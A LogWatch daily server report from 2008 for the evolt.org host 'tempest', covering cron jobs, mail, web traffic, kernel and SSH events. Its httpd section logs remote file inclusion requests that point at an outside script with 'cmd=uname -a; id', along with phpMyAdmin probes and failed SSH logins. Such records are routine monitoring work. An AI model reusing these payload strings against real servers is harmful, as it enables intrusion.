[Sysadmin] LogWatch for tempest
root
root at tempest.evolt.org
Wed Jan 23 06:25:22 CST 2008
################### LogWatch 5.2.2 (06/23/04) ####################
Processing Initiated: Wed Jan 23 06:25:13 2008
Date Range Processed: yesterday
Detail Level of Output: 10
Logfiles for Host: tempest
################################################################
--------------------- Cron Begin ------------------------
Commands Run:
User dkaufman:
/bin/date > $HOME/date.txt: 1440 Time(s)
User dmah:
/home/dmah/bin/article_reminder.pl: 1 Time(s)
/home/dmah/bin/comment_reminder.pl: 1 Time(s)
User mailman:
/home/mailman/bin/discardbysubj.pl: 24 Time(s)
/usr/bin/python -S /home/mailman/lists.evolt.org/cron/checkdbs: 1 Time(s)
/usr/bin/python -S /home/mailman/lists.evolt.org/cron/disabled: 1 Time(s)
/usr/bin/python -S /home/mailman/lists.evolt.org/cron/gate_news: 288 Time(s)
/usr/bin/python -S /home/mailman/lists.evolt.org/cron/nightly_gzip: 1 Time(s)
/usr/bin/python -S /home/mailman/lists.evolt.org/cron/senddigests: 1 Time(s)
User root:
run-parts --report /etc/cron.hourly: 24 Time(s)
[ -d /var/lib/php4 ] && find /var/lib/php4/ -type f -cmin +$(/usr/lib/php4/maxlifetime) -print0 | xargs -r -0 rm: 48 Time(s)
/store/host/browsers.evolt.org/mkarchivesize: 1 Time(s)
/usr/bin/freshclam --quiet -l /var/log/clam-update.log: 1 Time(s)
/usr/local/bin/planetupdate 1>/dev/null 2>&1: 24 Time(s)
/usr/sbin/ntpdate -su us.pool.ntp.org us.pool.ntp.org: 1 Time(s)
/var/qmail/bin/qmailstats 1>/dev/null 2>/dev/null: 1 Time(s)
if [ -x /usr/bin/vnstat ] && [ `ls /var/lib/vnstat/ | wc -l` -ge 1 ]; then /usr/bin/vnstat -u; fi: 288 Time(s)
test -x /usr/sbin/anacron || run-parts --report /etc/cron.daily: 1 Time(s)
test -x /usr/sbin/cron-apt && /usr/sbin/cron-apt: 1 Time(s)
wget -O - -q http://evolt.org/cron.php: 72 Time(s)
User www-data:
[ -x /usr/lib/cgi-bin/awstats.pl -a -f /etc/awstats/awstats.conf -a -r /var/log/apache/access.log ] && /usr/lib/cgi-bin/awstats.pl -config=awstats -update >/dev/null: 144 Time(s)
---------------------- Cron End -------------------------
--------------------- EXIM Begin ------------------------
--- Messages history ---
-MsgID: 1JHIBt-0005iG-00:
2008-01-22 06:25:21 <= root at tempest.evolt.org U=root P=local S=18085
2008-01-22 06:28:31 lists.evolt.org [67.19.100.195]: Connection timed out
2008-01-22 06:28:31 == sysadmin at lists.evolt.org T=local_smtp defer (110): Connection timed out
2008-01-22 06:28:31 failed to open DB file /var/spool/exim/db/retry: File exists
-MsgID: 1JHLv5-000502-00:
2008-01-22 10:28:03 <= root at tempest.evolt.org U=root P=local S=1008
2008-01-22 10:31:13 lists.evolt.org [67.19.100.195]: Connection timed out
2008-01-22 10:31:13 == root at lists.evolt.org <root at tempest.evolt.org> T=local_smtp defer (110): Connection timed out
2008-01-22 10:31:13 failed to open DB file /var/spool/exim/db/retry: File exists
26 messages delivered immediately to 26 total recipients
---------------------- EXIM End -------------------------
--------------------- httpd Begin ------------------------
0.79 MB transfered in 695 responses (1xx 0, 2xx 73, 3xx 12, 4xx 610, 5xx 0)
88 Images (0.03 MB),
9 Documents (0.00 MB),
4 Archives (0.00 MB),
457 Content pages (0.52 MB),
17 Program source files (0.13 MB),
120 Other (0.12 MB)
Attempts to use 1 known hacks were logged 159 time(s)
phpmyadmin by
208.64.36.88 159 time(s)
A total of 1 sites probed the server
208.64.36.88
A total of 48 unidentified 'other' records logged
GET /turkif HTTP/1.0 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/dns/org.evolters?annotate=1.6 HTTP/1.0 with response code(s) 1 200 responses
GET /stone HTTP/1.1 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/beo_ng/Attic/evolt.ico?view=graph HTTP/1.1 with response code(s) 1 200 responses
GET /these-things-i-know-php-tips\" class=http://www.webzenxd.kit.net/tool25.txt?&cmd=uname%20-a;%20id HTTP/1.1 with response code(s) 3 400 responses
GET /cgi-bin/viewcvs.cgi/*checkout*/dns/org.evolters?rev=1.6 HTTP/1.1 with response code(s) 1 200 responses
GET /djc/temp/CREDITS HTTP/1.0 with response code(s) 1 404 responses
GET /luminosity? HTTP/1.0 with response code(s) 1 404 responses
GET /djc/stdio/index.cfm/daddy/show/mommy/49 HTTP/1.1 with response code(s) 1 404 responses
GET /signup.cfm HTTP/1.1 with response code(s) 5 404 responses
GET /webdad/testing/day_scheduler.html, HTTP/1.0 with response code(s) 1 404 responses
GET /dshadovi HTTP/1.0 with response code(s) 1 404 responses
GET /jswiders HTTP/1.1 with response code(s) 1 404 responses
GET /signup.cfm HTTP/1.0 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/print.module?annotate=1.15 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/weo_html/evoltorg.psd?view=log&only_with_tag=HEAD&r1=1.1 HTTP/1.0 with response code(s) 1 200 responses
GET /StOne HTTP/1.0 with response code(s) 1 404 responses
GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1 with response code(s) 3 400 responses
GET /jeff/code/input_value.cfm?sub=1 HTTP/1.1 with response code(s) 1 404 responses
GET /kristyfrey HTTP/1.0 with response code(s) 1 404 responses
GET /seb HTTP/1.1 with response code(s) 1 404 responses
GET /Isaac HTTP/1.0 with response code(s) 1 404 responses
GET /dshadovi/traffic.cfm HTTP/1.1 with response code(s) 1 404 responses
GET /dshadovi HTTP/1.1 with response code(s) 1 404 responses
GET /jswiders HTTP/1.0 with response code(s) 2 404 responses
GET /jeff/code/preload_n_rollover HTTP/1.0 with response code(s) 3 404 responses
GET /matthewo HTTP/1.0 with response code(s) 1 404 responses
GET /tos.cfm HTTP/1.0 with response code(s) 1 404 responses
- with response code(s) 36 408 responses
GET /garrett/site/books/factual HTTP/1.0 with response code(s) 1 404 responses
GET /jeff/code/js_url_variables/index.cfm HTTP/1.1 with response code(s) 1 404 responses
GET /mantruc/blog HTTP/1.1 with response code(s) 3 404 responses
GET /jeff/code/preload_n_rollover HTTP/1.1 with response code(s) 3 404 responses
GET /jeff/code/unchecking_radio_buttons.cfm HTTP/1.0 with response code(s) 1 404 responses
GET /dshadovi/MM_resources.cfm HTTP/1.1 with response code(s) 1 404 responses
GET /php-login-system-with-admin-features\" class=http://www.webzenxd.kit.net/tool25.txt?&cmd=uname%20-a;%20id HTTP/1.1 with response code(s) 3 400 responses
GET /shaggy/windows/user, HTTP/1.1 with response code(s) 1 404 responses
GET /members.cfm HTTP/1.0 with response code(s) 1 404 responses
GET /jeff/code/imagemap_rollover/index.cfm HTTP/1.1 with response code(s) 2 404 responses
GET /mpember/afroapix/website/index.php'. HTTP/1.0 with response code(s) 1 404 responses
GET /cgi-bin/viewcvs.cgi/weo_theme/print.module?annotate=1.5 HTTP/1.0 with response code(s) 1 200 responses
GET /cgi-bin/viewcvs.cgi/weo_html/evoltorg.psd?view=log&only_with_tag=MAIN&r1=1.1 HTTP/1.0 with response code(s) 1 200 responses
GET /dshadovi/MM_resources.cfm HTTP/1.0 with response code(s) 1 404 responses
GET /jeff/code/checkbox_check_all.cfm HTTP/1.1 with response code(s) 2 404 responses
GET /dshadovi/cftree/cftree_event.cfm HTTP/1.1 with response code(s) 1 404 responses
GET /garrett/site/books/factual HTTP/1.1 with response code(s) 4 404 responses
GET /djc/stdio/index.cfm/daddy/show/mommy/66 HTTP/1.0 with response code(s) 1 404 responses
GET /f%3Cspan%20class= HTTP/1.1 with response code(s) 1 404 responses
A total of 12 ROBOTS were logged
Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) 7 time(s)
WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU) 2 time(s)
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 3 time(s)
<b> Runnk RSS finder: http://www.runnk.com/il/law : Israeli legal : Mishpat : עורכי דין : חוק ומשפט </b> (hybridwse at runnk.com) 3 time(s)
ia_archiver-web.archive.org 1 time(s)
msnbot/1.0 (+http://search.msn.com/msnbot.htm) 15 time(s)
Yeti/0.01 (nhn/1noon, yetibot at naver.com, check robots.txt daily and follow it) 5 time(s)
VadixBot 1 time(s)
Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html) 1 time(s)
Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/) 4 time(s)
msnbot-media/1.0 (+http://search.msn.com/msnbot.htm) 4 time(s)
Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp) 1 time(s)
---------------------- httpd End -------------------------
--------------------- Kernel Begin ------------------------
2 Time(s): NET: 10 messages suppressed.
1 Time(s): NET: 12 messages suppressed.
1 Time(s): NET: 13 messages suppressed.
1 Time(s): NET: 18 messages suppressed.
1 Time(s): NET: 21 messages suppressed.
1 Time(s): NET: 23 messages suppressed.
1 Time(s): NET: 28 messages suppressed.
1 Time(s): NET: 3 messages suppressed.
1 Time(s): NET: 34 messages suppressed.
1 Time(s): NET: 41 messages suppressed.
1 Time(s): NET: 46 messages suppressed.
1 Time(s): NET: 5 messages suppressed.
1 Time(s): NET: 9 messages suppressed.
1 Time(s): TCP: drop open request from 208.98.47.226/15012
1 Time(s): TCP: drop open request from 208.98.47.226/19985
1 Time(s): TCP: drop open request from 208.98.47.226/20085
1 Time(s): TCP: drop open request from 208.98.47.226/21947
1 Time(s): TCP: drop open request from 208.98.47.226/28471
1 Time(s): TCP: drop open request from 208.98.47.226/29592
1 Time(s): TCP: drop open request from 208.98.47.226/33446
1 Time(s): TCP: drop open request from 208.98.47.226/36292
1 Time(s): TCP: drop open request from 208.98.47.226/37752
1 Time(s): TCP: drop open request from 208.98.47.226/39974
1 Time(s): TCP: drop open request from 208.98.47.226/44208
1 Time(s): TCP: drop open request from 208.98.47.226/45137
1 Time(s): TCP: drop open request from 208.98.47.226/51028
1 Time(s): TCP: drop open request from 208.98.47.226/54225
1 Time(s): TCP: drop open request from 208.98.47.226/59813
1 Time(s): TCP: drop open request from 208.98.47.226/61977
1 Time(s): TCP: drop open request from 208.98.47.226/8418
1 Time(s): TCP: drop open request from 208.98.47.226/9931
1 Time(s): TCP: drop open request from 208.98.47.227/18043
1 Time(s): TCP: drop open request from 208.98.47.227/34202
1 Time(s): TCP: drop open request from 208.98.47.227/39478
1 Time(s): TCP: drop open request from 208.98.47.227/40383
1 Time(s): TCP: drop open request from 208.98.47.227/4489
1 Time(s): TCP: drop open request from 208.98.47.227/47686
1 Time(s): TCP: drop open request from 208.98.47.227/51931
1 Time(s): TCP: drop open request from 208.98.47.227/8712
1 Time(s): TCP: drop open request from 61.247.217.36/47401
1 Time(s): TCP: drop open request from 64.157.224.151/4679
1 Time(s): TCP: drop open request from 65.54.165.39/37609
1 Time(s): TCP: drop open request from 66.249.70.131/47617
1 Time(s): TCP: drop open request from 66.252.17.242/12967
1 Time(s): TCP: drop open request from 66.252.17.242/20412
1 Time(s): TCP: drop open request from 66.252.17.242/22425
1 Time(s): TCP: drop open request from 66.252.17.242/54482
1 Time(s): TCP: drop open request from 66.252.17.242/55031
1 Time(s): TCP: drop open request from 66.252.17.242/58939
1 Time(s): TCP: drop open request from 66.252.17.242/59444
1 Time(s): TCP: drop open request from 66.252.17.242/60874
1 Time(s): TCP: drop open request from 66.252.17.242/828
1 Time(s): TCP: drop open request from 66.252.17.242/8613
1 Time(s): TCP: drop open request from 74.6.19.102/44861
1 Time(s): TCP: drop open request from 76.17.220.55/2156
1 Time(s): TCP: drop open request from 83.237.51.251/2971
1 Time(s): TCP: drop open request from 86.107.130.2/15861
1 Time(s): TCP: drop open request from 86.107.130.2/27810
1 Time(s): TCP: drop open request from 86.107.130.2/27835
1 Time(s): TCP: drop open request from 86.107.130.2/31617
1 Time(s): TCP: drop open request from 86.107.130.2/41795
1 Time(s): TCP: drop open request from 86.107.130.2/47274
1 Time(s): TCP: drop open request from 86.107.130.2/48275
1 Time(s): TCP: drop open request from 86.107.130.2/48611
1 Time(s): TCP: drop open request from 86.107.130.2/5226
1 Time(s): TCP: drop open request from 86.107.130.2/64052
1 Time(s): TCP: drop open request from 86.107.130.2/7956
1 Time(s): TCP: drop open request from 86.107.130.2/8267
1 Time(s): TCP: drop open request from 86.107.131.91/14600
1 Time(s): TCP: drop open request from 86.107.131.91/16723
1 Time(s): TCP: drop open request from 86.107.131.91/20079
1 Time(s): TCP: drop open request from 86.107.131.91/20143
1 Time(s): TCP: drop open request from 86.107.131.91/22262
1 Time(s): TCP: drop open request from 86.107.131.91/22592
1 Time(s): TCP: drop open request from 86.107.131.91/23300
1 Time(s): TCP: drop open request from 86.107.131.91/24442
1 Time(s): TCP: drop open request from 86.107.131.91/26862
1 Time(s): TCP: drop open request from 86.107.131.91/28057
1 Time(s): TCP: drop open request from 86.107.131.91/29748
1 Time(s): TCP: drop open request from 86.107.131.91/31426
1 Time(s): TCP: drop open request from 86.107.131.91/3415
1 Time(s): TCP: drop open request from 86.107.131.91/36287
1 Time(s): TCP: drop open request from 86.107.131.91/36377
1 Time(s): TCP: drop open request from 86.107.131.91/38091
1 Time(s): TCP: drop open request from 86.107.131.91/39782
1 Time(s): TCP: drop open request from 86.107.131.91/42544
1 Time(s): TCP: drop open request from 86.107.131.91/44460
1 Time(s): TCP: drop open request from 86.107.131.91/44592
1 Time(s): TCP: drop open request from 86.107.131.91/44679
1 Time(s): TCP: drop open request from 86.107.131.91/49771
1 Time(s): TCP: drop open request from 86.107.131.91/5570
1 Time(s): TCP: drop open request from 86.107.131.91/55877
1 Time(s): TCP: drop open request from 86.107.131.91/60506
1 Time(s): TCP: drop open request from 86.107.131.91/61346
1 Time(s): TCP: drop open request from 86.107.131.91/61746
1 Time(s): TCP: drop open request from 86.107.131.91/63356
1 Time(s): TCP: drop open request from 86.107.131.91/7377
1 Time(s): TCP: drop open request from 86.107.131.91/8735
1 Time(s): TCP: drop open request from 86.107.131.91/8737
1 Time(s): UDP: short packet: 12.96.160.115:53 123/107 to 67.19.100.194:44197
1 Time(s): UDP: short packet: 12.96.160.115:53 157/141 to 67.19.100.194:44911
1 Time(s): UDP: short packet: 12.96.160.115:53 157/141 to 67.19.100.194:60458
1 Time(s): UDP: short packet: 12.96.160.115:53 184/168 to 67.19.100.194:64715
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:37231
1 Time(s): UDP: short packet: 12.96.160.115:53 213/197 to 67.19.100.194:57672
1 Time(s): UDP: short packet: 12.96.160.115:53 221/205 to 67.19.100.194:50414
1 Time(s): UDP: short packet: 12.96.160.115:53 276/260 to 67.19.100.194:48840
1 Time(s): UDP: short packet: 12.96.160.115:53 281/265 to 67.19.100.194:40145
1 Time(s): UDP: short packet: 12.96.160.115:53 315/299 to 67.19.100.194:34069
1 Time(s): UDP: short packet: 12.96.160.115:53 505/489 to 67.19.100.194:59965
1 Time(s): UDP: short packet: 12.96.160.115:53 530/514 to 67.19.100.194:40268
1 Time(s): UDP: short packet: 12.96.160.115:53 530/514 to 67.19.100.194:45752
1 Time(s): device eth0 entered promiscuous mode
1 Time(s): device eth0 left promiscuous mode
4 Time(s): sending pkt_too_big (len[1500] pmtu[1496]) to self
---------------------- Kernel End -------------------------
--------------------- pam_unix Begin ------------------------
cron:
Sessions Opened:
dkaufman: 1440 Time(s)
root: 462 Time(s)
mailman: 316 Time(s)
www-data: 144 Time(s)
dmah: 2 Time(s)
sshd:
Authentication Failures:
unknown (rubisco.ugr.es): 4 Time(s)
Invalid Users:
Unknown Account: 4 Time(s)
su:
Sessions Opened:
(uid=0) -> nobody: 1 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Connections (secure-log) Begin ------------------------
**Unmatched Entries**
perl: gethostby*.getanswer: asked for "2.70.152.198.in-addr.arpa IN PTR", got type "39"
---------------------- Connections (secure-log) End -------------------------
--------------------- sendmail Begin ------------------------
ERROR: Could not open /etc/mail/local-host-names
ERROR: Could not open /etc/mail/access
Message Size Distribution:
Range # Msgs KBytes
0 - 10k 0 0
10k - 20k 0 0
20k - 50k 0 0
50k - 100k 0 0
100k - 500k 0 0
500k - 1Mb 0 0
1Mb - 2Mb 0 0
2Mb - 5Mb 0 0
5Mb - 10Mb 0 0
10Mb+ 0 0
----------------------------------
TOTAL 0 0
---------------------- sendmail End -------------------------
--------------------- SSHD Begin ------------------------
Didn't receive an ident from these IPs:
24-176-255-158.static.reno.nv.charter.com (24.176.255.158): 5 Time(s)
Failed logins from these:
andrea/keyboard-interactive/pam from 150.214.60.61: 4 Time(s)
Illegal users from these:
andrea/keyboard-interactive/pam from 150.214.60.61: 4 Time(s)
andrea/none from 150.214.60.61: 4 Time(s)
Error in PAM authentication:
User not known to the underlying authentication module for illegal user andrea from rubisco.ugr.es : 4 Time(s)
---------------------- SSHD End -------------------------
--------------------- Syslogd Begin ------------------------
Syslogd started 1 Time(s)
---------------------- Syslogd End -------------------------
------------------ Disk Space --------------------
/dev/hda3 72G 24G 44G 36% /
/dev/hda1 92M 6.3M 81M 8% /boot
###################### LogWatch End #########################